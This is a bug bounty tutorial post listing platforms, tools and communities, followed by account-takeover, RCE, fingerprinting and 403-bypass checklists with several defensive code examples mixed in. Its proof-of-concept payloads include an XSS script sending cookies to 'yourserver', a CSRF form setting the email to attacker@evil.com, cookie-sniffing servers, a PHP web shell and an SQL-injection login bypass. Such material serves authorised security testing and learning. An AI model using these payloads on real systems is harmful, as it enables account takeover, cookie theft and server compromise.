Bugbounty Resources and Tools

By Waseem Akram on 3/1/2024


Bug bounty programs are a great way to earn money by finding and reporting security vulnerabilities in web applications and software. If you're interested in bug bounty hunting and security research, there are a number of resources and tools that can help you get started. In this article, we'll explore some of the best bug bounty resources and tools that you can use to enhance your skills and find more bugs.

Bug Bounty Platforms

There are several bug bounty platforms that host bug bounty programs from various companies. These platforms provide a marketplace for security researchers to find and report vulnerabilities in exchange for rewards. Some of the popular bug bounty platforms include:

  1. HackerOne: HackerOne is one of the largest bug bounty platforms, hosting programs from companies like Google, Microsoft, and PayPal.

  2. Bugcrowd: Bugcrowd is another popular bug bounty platform that hosts programs from companies like Mastercard, Fitbit, and Tesla.

  3. Synack: Synack is a crowdsourced security platform that connects security researchers with companies looking to improve their security posture.

  4. Intigriti: Intigriti is a bug bounty platform that hosts programs from companies like Spotify, Dropbox, and Airbnb.

Bug Bounty Tools

In addition to bug bounty platforms, there are several tools that can help you find and report security vulnerabilities. Some of the popular bug bounty tools include:

  1. Burp Suite: Burp Suite is a web application security testing tool that can help you find vulnerabilities like SQL injection, cross-site scripting, and more.

  2. Nmap: Nmap is a network scanning tool that can help you discover hosts and services on a network.

  3. Metasploit: Metasploit is a penetration testing framework that can help you test the security of web applications and networks.

  4. Sublist3r: Sublist3r is a subdomain enumeration tool that can help you find subdomains of a target domain.

Bug Bounty Communities

Bug bounty communities are a great way to connect with other security researchers, share knowledge, and learn from each other. Some of the popular bug bounty communities include:

  1. Bugcrowd Forum: The Bugcrowd Forum is a community of security researchers who share tips, tricks, and resources for bug bounty hunting.

  2. HackerOne Community: The HackerOne Community is a forum where security researchers can ask questions, share knowledge, and collaborate on bug bounty programs.

  3. Reddit Bug Bounty: The Reddit Bug Bounty community is a subreddit where security researchers can discuss bug bounty programs, tools, and resources.

  4. Twitter: Twitter is a great platform to connect with other security researchers, share your findings, and stay up to date on the latest bug bounty programs.

Bug Bounty Resources

    Account Takeover Checklist

    • login:
      • check if you are able to brute force the password
      • test for OAuth misconfigurations
      • check if you are able to brute force the login OTP
      • check for JWT misconfigurations
      • test for SQL injection to bypass authentication, e.g. admin" or 1=1;--
      • check if the application validates the OTP or token
    • password reset:
      • check if you are able to brute force the password reset OTP
      • test for token predictability
      • test for JWT misconfigurations
      • check if the password reset endpoint is vulnerable to IDOR
      • check if the password reset endpoint is vulnerable to Host header injection
      • check if the password reset endpoint leaks the token or OTP in the HTTP response
      • check if the application validates the OTP or token
      • test for HTTP Parameter Pollution (HPP)
    • XSS to Account Takeover:
      • if the application does not use an auth token, or you can't access the cookies because of the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password
      • try to exfiltrate the cookies
      • try to exfiltrate the auth token
      • if the cookie's "domain" attribute is set, search for XSS in the subdomains and use it to exfiltrate the cookies
      • PoC Example:
    <script>
      /*
      this script creates a hidden <img> element;
      when the browser tries to load the image, the victim's cookies
      are sent to your server
      */
      var new_img = document.createElement('img');
      new_img.src = "http://yourserver/" + document.cookie;
      new_img.style = 'display: none;';
      document.body.appendChild(new_img);
    </script>
    • CSRF to Account Takeover:
      • check if the email update endpoint is vulnerable to CSRF
      • check if the password update endpoint is vulnerable to CSRF
      • PoC Example:
    <html>
      <head>
        <title>CSRF PoC</title>
      </head>
      <body>
        <form name='attack' action='https://example.com/update-email' method='POST'>
          <input type="hidden" name="new_email" value="attacker@evil.com">
          <input type="submit" name="submit" value="submit" hidden>
        </form>
        <script>
          document.attack.submit.click()
        </script>
      </body>
    </html>
    • IDOR to Account Takeover:
      • check if the email update endpoint is vulnerable to IDOR
      • check if the password change endpoint is vulnerable to IDOR
      • check if the password reset endpoint is vulnerable to IDOR
    • subdomain takeover:
      • first-order: check if you can take over xyz.example.com; if you can, you can host any malicious code there to steal users' info or cookies
      • PoC Example:
    #python
    #!/usr/bin/python3
    from flask import Flask, request

    app = Flask(__name__)

    @app.route('/')
    def cookie_sniffer():
        # log every cookie the victim's browser sends to the taken-over subdomain
        for c_name, c_value in request.cookies.items():
            print(c_name + ': ' + c_value)
        return 'Hello, world'

    if __name__ == '__main__':
        app.run(port=80)
      • second-order (broken link hijacking): if you found a broken link in a webpage (https://nonexistentlink.com/app.js) and you can take over this domain, you can host any malicious JavaScript file there and use it to steal users' info or cookies
      • PoC Example:
    #javascript
    var user_cookies = {
        "cookies": document.cookie
    };
    var xhttp = new XMLHttpRequest();
    xhttp.open("POST", "/store-cookies", true);
    xhttp.send(JSON.stringify(user_cookies));
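
On the defending side, the login and password-reset items above reduce to a few server-side properties: reset tokens drawn from a CSPRNG and stored only as hashes, bound to an expiry, consumed on first use, never echoed in the response, and OTP guesses capped so a six-digit code cannot be brute forced. The following is an added example (not the author's code) of a reset store with those properties; ResetStore, the 15-minute TTL and the five-attempt limit are assumed names and policies.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60  # assumed policy: reset tokens and OTPs expire after 15 minutes
MAX_OTP_ATTEMPTS = 5         # assumed policy: an OTP is locked after five wrong guesses


def _now(now):
    return time.time() if now is None else now


class ResetStore:
    """In-memory stand-in for the database rows a real application would use."""

    def __init__(self):
        self.tokens = {}  # sha256(token) -> (user, expires_at); only hashes are stored
        self.otps = {}    # user -> {"hash": sha256(otp), "attempts": int, "expires_at": float}

    def issue_token(self, user, now=None):
        # 32 bytes from the OS CSPRNG: not predictable from time, user id or earlier tokens
        token = secrets.token_urlsafe(32)
        self.tokens[hashlib.sha256(token.encode()).hexdigest()] = (user, _now(now) + TOKEN_TTL_SECONDS)
        return token  # goes into the reset e-mail only, never into the HTTP response

    def redeem_token(self, token, now=None):
        # pop() makes the token single-use; lookup by hash means a leaked table leaks no usable tokens
        entry = self.tokens.pop(hashlib.sha256(token.encode()).hexdigest(), None)
        if entry is None or _now(now) > entry[1]:
            return None
        return entry[0]

    def issue_otp(self, user, now=None):
        otp = f"{secrets.randbelow(10 ** 6):06d}"
        self.otps[user] = {"hash": hashlib.sha256(otp.encode()).hexdigest(),
                           "attempts": 0, "expires_at": _now(now) + TOKEN_TTL_SECONDS}
        return otp

    def verify_otp(self, user, guess, now=None):
        rec = self.otps.get(user)
        if rec is None or _now(now) > rec["expires_at"]:
            return False
        rec["attempts"] += 1
        if rec["attempts"] > MAX_OTP_ATTEMPTS:
            del self.otps[user]  # a six-digit code survives only a handful of guesses: lock it
            return False
        ok = hmac.compare_digest(rec["hash"], hashlib.sha256(guess.encode()).hexdigest())
        if ok:
            del self.otps[user]  # single use
        return ok
```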

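For the broken link hijacking item, a defender wants to find dangling third-party references on their own pages before anyone registers the host. The following is an added example (not from the original post) that parses a page's script and stylesheet tags and flags hosts that no longer resolve, or that resolve but lack a Subresource Integrity attribute; the resolver is injected so it runs offline, and the sample page and host list are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ResourceCollector(HTMLParser):
    """Collects every <script src> and <link rel=stylesheet href> on a page."""

    def __init__(self):
        super().__init__()
        self.refs = []  # (kind, url, has_integrity_attribute)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script" and a.get("src"):
            self.refs.append(("script", a["src"], "integrity" in a))
        elif tag == "link" and "stylesheet" in a.get("rel", "").lower() and a.get("href"):
            self.refs.append(("stylesheet", a["href"], "integrity" in a))


def audit_external_resources(html, own_host, host_resolves):
    """Flag third-party script/stylesheet references on one of your own pages.
    host_resolves(hostname) -> bool is injected so the audit runs offline here
    (wire it to a DNS lookup in production). Returns (severity, kind, url, reason) tuples."""
    collector = _ResourceCollector()
    collector.feed(html)
    findings = []
    for kind, url, has_sri in collector.refs:
        host = urlparse(url).hostname  # None for relative (same-origin) URLs
        if host is None or host.lower() == own_host.lower():
            continue
        if not host_resolves(host):
            # dangling reference: whoever registers this host serves code into your page
            findings.append(("high", kind, url, "host does not resolve (broken link hijacking)"))
        elif not has_sri:
            # still third-party controlled: an integrity hash makes a swapped file fail to load
            findings.append(("medium", kind, url, "third-party resource without integrity attribute"))
    return findings


# Constructed sample page and stand-in resolver so the audit runs without network access.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://cdn.example.net/site.css" integrity="sha384-PLACEHOLDER">
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script src="https://nonexistentlink.com/app.js"></script>
</head><body></body></html>"""
KNOWN_HOSTS = {"www.example.com", "cdn.example.net"}  # constructed; nonexistentlink.com is dangling

def sample_findings():
    return audit_external_resources(SAMPLE_HTML, "www.example.com", lambda h: h in KNOWN_HOSTS)
```
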
    Remote Code/Command Execution (RCE) Checklist

    • Server Side Request Forgery (SSRF) to RCE:
      • if you found an SSRF, try to escalate it to RCE by interacting with internal services; to do this you can craft a Gopher payload to interact with services like MySQL, for example with Gopherus
    • File Upload to RCE:
      • if you found an unrestricted file upload vulnerability, try to upload a malicious file to get a reverse shell
      • PoC Example:
    #php
    <?php system($_GET["cmd"]); ?>
    • Dependency Confusion Attack:
      • search for packages that may be used internally by your target, then register a malicious public package with the same name; you can use the confused tool
    • Server Side Template Injection (SSTI) to RCE:
      • if you found an SSTI, you can exploit it with tplmap to get an RCE
    • SQL Injection to RCE:
      • if you found an SQL injection, you can craft a special query to write an arbitrary file on the system (SQL injection shell)
    • LaTeX Injection to RCE:
      • if you found a web-based LaTeX compiler, test if it is vulnerable to RCE (LaTeX to command execution)
    • Local File Inclusion (LFI) to RCE:
      • if you found an LFI, try to escalate it to RCE via these methods; you can automate the process using liffy
    • Insecure deserialization to RCE:
      • check if the application is vulnerable to insecure deserialization
      • how to identify if the app is vulnerable:
        • try to find out the language used to build the application
        • learn about the methods used to serialize and deserialize data in this language
        • by analyzing the data that comes from the application you can identify the method
        • try to craft a special payload to get an RCE
      • check this cheatsheet
      • Java Deserialization Scanner: a Burp Suite plugin to detect and exploit Java deserialization vulnerabilities
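
The "analyze the data to identify the method" step above can be automated, because each native serialization format starts with a recognisable prefix (Java streams begin with AC ED 00 05, which is "rO0AB" once base64-encoded). The following is an added example (not from the original post) that identifies Java, Python pickle, Ruby Marshal, .NET BinaryFormatter and PHP serialized values whether they appear raw or base64-encoded, which is useful for triaging cookies and parameters in a proxy log or for a detection rule; the function names are assumed.

```python
import base64
import binascii
import re
from typing import Optional, Tuple

# Leading bytes of common native serialization formats (well-known magic values).
_SIGNATURES = (
    ("java", lambda b: b.startswith(b"\xac\xed\x00\x05")),
    # pickle protocol >= 2 opens with the PROTO opcode 0x80 and the protocol number
    ("python-pickle", lambda b: len(b) >= 2 and b[0] == 0x80 and 2 <= b[1] <= 5),
    ("ruby-marshal", lambda b: b.startswith(b"\x04\x08")),
    # BinaryFormatter SerializationHeaderRecord: type 0, root id 1, header id -1
    ("dotnet-binaryformatter", lambda b: b.startswith(b"\x00\x01\x00\x00\x00\xff\xff\xff\xff")),
    ("php", lambda b: re.match(rb'^(O:\d+:"|a:\d+:\{|s:\d+:"|i:-?\d+;|b:[01];|d:)', b) is not None),
)


def _match(blob: bytes) -> Optional[str]:
    for name, check in _SIGNATURES:
        if check(blob):
            return name
    return None


def _try_base64(blob: bytes) -> Optional[bytes]:
    # Serialized objects usually travel base64-encoded (cookies, hidden fields, JSON strings);
    # accept both the standard and the URL-safe alphabet and repair stripped padding.
    s = blob.strip()
    if not re.fullmatch(rb"[A-Za-z0-9+/=_-]+", s):
        return None
    s = s.translate(bytes.maketrans(b"-_", b"+/")) + b"=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def identify_serialization(blob) -> Optional[Tuple[str, str]]:
    """Return (format, encoding) for a value seen in traffic or logs, or None if unrecognised."""
    if isinstance(blob, str):
        blob = blob.encode("latin-1", "replace")
    fmt = _match(blob)
    if fmt:
        return (fmt, "raw")
    decoded = _try_base64(blob)
    if decoded is not None:
        fmt = _match(decoded)
        if fmt:
            return (fmt, "base64")
    return None
```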

    Web Applications Fingerprinting tools

    • Wappalyzer
      • you can use the Wappalyzer extension for Firefox or Chrome for web app fingerprinting
    • BuiltWith
      • you can use the BuiltWith extension for Firefox or Chrome for web app fingerprinting
    • httpx
      • you can use the -web-server and -tech-detect options
    #bash
    # a single domain
    echo example.com | httpx -web-server -tech-detect

    # a list of subdomains
    cat subdomains_list.txt | httpx -web-server -tech-detect

    httpx -l subdomains_list.txt -web-server -tech-detect
    • Aquatone
      • Aquatone is a tool for visual inspection of websites across a large number of hosts and is convenient for quickly gaining an overview of the HTTP-based attack surface
    #bash
    cat hosts.txt | aquatone
    • nuclei
    #bash
    nuclei -t ~/nuclei-templates -tags tech -u https://example.com -c 200
    • whatweb
      • has 1800 plugins to identify technologies; you can use it to fingerprint web apps
    #bash
    # a single host
    whatweb example.com

    # a list of hosts
    whatweb --input-file=hosts.txt
    • Error messages
      • you can identify technologies via error messages: if a web app does not handle errors and you send it malformed data, the data will cause an error, and that error may reveal the back-end technology
    #http
    POST / HTTP/1.1
    Host: example.com
    User-Agent: curl/7.74.0
    Accept: */*
    Content-type: application/json
    Content-Length: 8

    {"test":d

    you can enumerate the web app endpoints and start fuzzing them with different HTTP methods, HTTP headers, and bodies

    • fuzzing http methods
    #http
    METHOD /ENDPOINT HTTP/1.1
    Host: example.com
    User-Agent: curl/7.74.0
    Accept: */*
    #bash
    ffuf -w http_methods.txt:METHOD -w endpoints.txt:ENDPOINT -request http_request.txt
    • fuzzing http headers
    #http
    GET /ENDPOINT HTTP/1.1
    Host: example.com
    User-Agent: curl/7.74.0
    Accept: */*
    #bash
    ffuf -w http_headers_names.txt:NAME -w http_headers_values.txt:VALUE -w endpoints.txt:ENDPOINT -request http_request.txt  -H "NAME: VALUE"

    403 - Bypass

    • FFUF
      • Path fuzzing
    #bash
    ffuf -w 403_url_payloads.txt -u http://example.com/auth_pathFUZZ -fc 403,401,400
    • HTTP Header Fuzzing
    #bash
    ffuf -w 403_bypass_header_names.txt:HEADER -w 403_bypass_header_values.txt:VALUE -u http://example.com/auth_path -H "HEADER:VALUE" -fc 403,401,400
    • Common HTTP Ports Fuzzing
    #bash
    ffuf -w common-http-ports.txt:PORT -u http://example.com/auth_path -H "Host: example.com:PORT" -fc 403,401,400
    • HTTP Methods Fuzzing
    #bash
    ffuf -w http-methods.txt:METHOD -u http://example.com/auth_path -X "METHOD" -fc 403,401,400
    • User Agent Fuzzing
    #bash
    ffuf -w user-agents.txt:AGENT -u http://example.com/auth_path -H "User-Agent: AGENT" -fc 403,401,400

    nuclei

    #bash
    nuclei -u http://example.com/auth_path/ -t 403-bypass-nuclei-templates -tags fuzz -timeout 10 -c 200 -v

    Note: add a trailing slash after the path, whether it is a directory or a file
